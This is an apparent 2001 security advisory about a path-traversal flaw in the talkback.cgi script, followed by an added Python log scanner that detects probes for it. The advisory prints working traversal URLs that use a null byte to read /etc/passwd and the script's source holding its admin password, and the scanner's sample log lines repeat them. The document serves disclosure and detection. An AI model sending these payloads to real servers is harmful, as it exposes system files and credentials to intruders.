From: Stan (stan@WHIZKUNDE.ORG)
Date: Mon Apr 09 2001 - 10:44:23 CDT
[whizkunde security advisory: talkback (CGI)]
http://www.whizkunde.org | stan@whizkunde.org
----------------------------------------------------------
Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: http://www.waytotheweb.com
----------------------------------------------------------
1. problem
Talkback.cgi may allow remote users (website visitors) to
view any file on a webserver (depending on the user the
webserver is running as).
Consider this URL:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display /etc/passwd (if the webserver user has
access to this file).
Another URL can display the source of talkback.cgi itself
that contains the admin password:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed.)
In this file you can find $admin_password, which can be used at
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
to post & delete articles.
2. fix
Way To The Web has released an updated version of
talkback.cgi that isn't vulnerable to this problem:
http://www.waytotheweb.com/webscripts/talkback.htm
----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
http://www.whizkunde.org
Copyright whizkunde security team 2001
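
Added example (not part of the original advisory or the vendor's code): scanning web server access logs for the request pattern described in section 1, so an administrator can tell whether the script was probed before it was upgraded. The Common Log Format, the sample log lines and the benign `article=12` value are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format is assumed: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')


def article_findings(url):
    """Return the reasons the article parameter of a talkback.cgi URL is suspect."""
    parts = urlsplit(url)
    if not parts.path.endswith("/talkback.cgi"):
        return []
    findings = []
    # parse_qs percent-decodes once, so %00 is seen here as a literal NUL byte.
    for value in parse_qs(parts.query, keep_blank_values=True).get("article", []):
        if "\x00" in value:
            findings.append("NUL byte")
        if ".." in value.replace("\\", "/").split("/"):
            findings.append("parent-directory segment")
        if value.startswith("/"):
            findings.append("absolute path")
    return findings


def scan(log_lines):
    """Return (client, status, findings) for every request that trips a check."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client, url, status = match.groups()
        findings = article_findings(url)
        if findings:
            # A 200 status means the script answered, so the file may have been read.
            hits.append((client, int(status), findings))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2001:10:50:01 -0500] "GET /cgi-bin/talkback.cgi?article=12&action=view&matchview=1 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [09/Apr/2001:10:51:13 -0500] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 200 1043',
    '192.0.2.77 - - [09/Apr/2001:10:51:40 -0500] "GET /cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1 HTTP/1.0" 200 20480',
]

if __name__ == "__main__":
    for client, status, findings in scan(SAMPLE_LOG):
        print(f"{client} status={status}: {', '.join(findings)}")
```

If a hit shows that the script's own source was returned, treat the admin password it contains as exposed and change it after upgrading.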